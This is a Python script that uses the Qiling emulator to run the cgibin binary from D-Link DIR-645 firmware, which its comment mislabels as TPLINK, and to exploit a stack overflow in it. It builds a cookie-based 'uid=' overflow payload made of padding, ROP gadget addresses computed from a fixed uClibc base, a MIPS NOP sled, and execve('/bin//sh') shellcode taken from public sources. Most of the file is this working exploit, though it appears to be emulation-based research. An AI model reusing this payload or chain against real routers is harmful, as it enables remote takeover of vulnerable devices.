qiling_dlink_exploit.py

#!/home/naah/.virtualenv/qiling_framework/bin/python3
  
# This simple scripts emulates the cgibin binary
# part of the DIR645A1_FW103RUB08 firmware for
# TPLINK DIR-645 Router.
# cgibin binary is affected by several vulnerabilities
# More information: 

import argparse
import sys
sys.path.append("..")

from capstone import *
from qiling import *
from qiling.const import *
from unicorn import *
from struct import pack

from qiling.const import *
from qiling.os.linux.thread import *
from qiling.const import *
from qiling.os.posix.filestruct import *
from qiling.os.filestruct import *
from qiling.os.posix.const_mapping import *
from qiling.exception import *


MAIN = 0x0402770
HEDWINCGI_MAIN_ADDR = 0x0040bfc0
SESS_GET_UID = 0x004083f0
RETURN_CORRUPTED_STACK = 0x0040c594
QILING_EXIT = 0x41ef40
QILING_PRINTF = 0x41f020
QILING_SYSTEM = 0x0041eb50

MIPS_FORK_SYSCALL = 0xfa2
MIPS_EXECVE_SYSCALL = 0xfab


def simulate_exploit(ql):

    ql.nprint("** at simulate_exploitation **")
    #import pdb
    #pdb.set_trace()
    #command = ql.mem.map_anywhere(20)
    #ql.mem.string(command, "/bin/sh")
    #ql.reg.a0 = command
    #ql.reg.ra = QILING_SYSTEM
    #ql.reg.a1 = 0
    #ql.reg.a2 = 0
    ql.reg.a0 = 1
    ql.reg.ra = 0x77552bd0 # sleep uClibc
    ql.reg.t9 = 0x77552bd0


# Code copied from lib/qiling/os/posix/syscall/unistd.py:380
def hook_fork(ql, *args, **kw):
    pid = os.fork()
    
    if pid == 0:
        ql.os.child_processes = True
        ql.dprint (0, "[+] vfork(): is this a child process: %r" % (ql.os.child_processes))
        regreturn = 0
        if ql.os.thread_management != None:
            ql.os.thread_management.cur_thread.set_thread_log_file(ql.log_dir)
        else:
            if ql.log_split:
                _logger = ql.log_file_fd
                _logger = ql_setup_logging_file(ql.output, ql.log_file , _logger)
                _logger_name = str(len(logging.root.manager.loggerDict))
                _logger = ql_setup_logging_file(ql.output, '_'.join((ql.log_file, _logger_name)))
                ql.log_file_fd = _logger
    else:
        regreturn = pid

    if ql.os.thread_management != None:
        ql.emu_stop()

    ql.nprint("vfork() = %d" % regreturn)
    ql.os.definesyscall_return(regreturn)

def execve_onenter(ql, pathname, argv, envp, *args):

    ql.nprint("at execve_onenter")
    ql.nprint(ql.mem.string(pathname))
    ql.nprint(ql.mem.string(argv))

def shellcode2():

    # execve shellcode translated from MIPS to MIPSEL
    # http://shell-storm.org/shellcode/files/shellcode-792.php
    # Taken from: https://www.pnfsoftware.com/blog/firmware-exploitation-with-jeb-part-2/
    
    shellcode = b""
    shellcode += b"\xff\xff\x06\x28" # slti $a2, $zero, -1
    shellcode += b"\x62\x69\x0f\x3c" # lui $t7, 0x6962
    shellcode += b"\x2f\x2f\xef\x35" # ori $t7, $t7, 0x2f2f
    shellcode += b"\xf4\xff\xaf\xaf" # sw $t7, -0xc($sp)
    shellcode += b"\x73\x68\x0e\x3c" # lui $t6, 0x6873
    shellcode += b"\x6e\x2f\xce\x35" # ori $t6, $t6, 0x2f6e
    shellcode += b"\xf8\xff\xae\xaf" # sw $t6, -8($sp)
    shellcode += b"\xfc\xff\xa0\xaf" # sw $zero, -4($sp)
    shellcode += b"\xf4\xff\xa4\x27" # addiu $a0, $sp, -0xc
    shellcode += b"\xff\xff\x05\x28" # slti $a1, $zero, -1
    shellcode += b"\xab\x0f\x02\x24" # addiu;$v0, $zero, 0xfab
    shellcode += b"\x0c\x01\x01\x01" # syscall 0x40404\
    

    buffer = b"uid=%s" % (b"B" * 1003)
    buffer += b"AAAA"
    #buffer += b"0000"                                      # Gadget #3
    buffer += pack("<I", calc_address(0x0001bb44))
    buffer += b"1111"
    buffer += b"2222"
    buffer += b"1111"
    buffer += b"4444"
    #buffer += b"5555"
    buffer += pack("<I", calc_address(0x0004dcb4))          # Gadget #2
    buffer += b"6666"
    buffer += b"7777"
    #buffer += b"8888"
    buffer += pack("<I", 0x77552bd0)                        # Sleep address
    buffer += pack("<I", 0x77527c94)                        # Overwrites $ra with address of gadget -> #1
    
    # MIPS nopsled from https://www.pnfsoftware.com/blog/firmware-exploitation-with-jeb-part-2/
    buffer += b"\x26\x40\x08\x01" * 30 + shellcode
    # ###########

    return buffer

def calc_address(addr_offset):
    LIBC_BASE = 0x774fc000

    return LIBC_BASE + addr_offset - 0x10000

def prepare_environment():

    buffer = b"uid=%s" % (b"A" * 1043)
    buffer += pack("<I", calc_address(0x000528b0))
    buffer += b"1" * 200

    required_env = {
        b"REQUEST_METHOD": b"POST",
        b"HTTP_COOKIE"   : shellcode2() #buffer #shellcode2()
    }

    return required_env


def my_sandbox(path, rootfs, debug=False):

    ql = Qiling(path, rootfs, output = "none", env=prepare_environment())
    ql.add_fs_mapper('/tmp', '/var/tmp')
    ql.hook_address(lambda ql: ql.nprint("** At [main] **"), MAIN)
    ql.hook_address(lambda ql: ql.nprint("** At [hedwingcgi_main] **"), HEDWINCGI_MAIN_ADDR)
    ql.hook_address(lambda ql: ql.nprint("** At [sess_get_uid] **"), SESS_GET_UID)
    ql.hook_address(lambda ql: ql.nprint("** Ret from sobj_add_string **"), 0x004085c4)
    #ql.hook_address(simulate_exploit, RETURN_CORRUPTED_STACK)
    #ql.set_syscall(MIPS_FORK_SYSCALL, hook_fork)
    #ql.set_syscall(MIPS_EXECVE_SYSCALL, execve_onenter, QL_INTERCEPT.ENTER)
    if debug:
        ql.debugger = True
    ql.run()

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('PathToCgibin',
                    help='Path to cgibin binary')
    parser.add_argument('PathToRootFs',
                help="Path to root fs")
    parser.add_argument('--debug', action='store_true')
    args = parser.parse_args()
    my_sandbox([args.PathToCgibin], args.PathToRootFs, args.debug)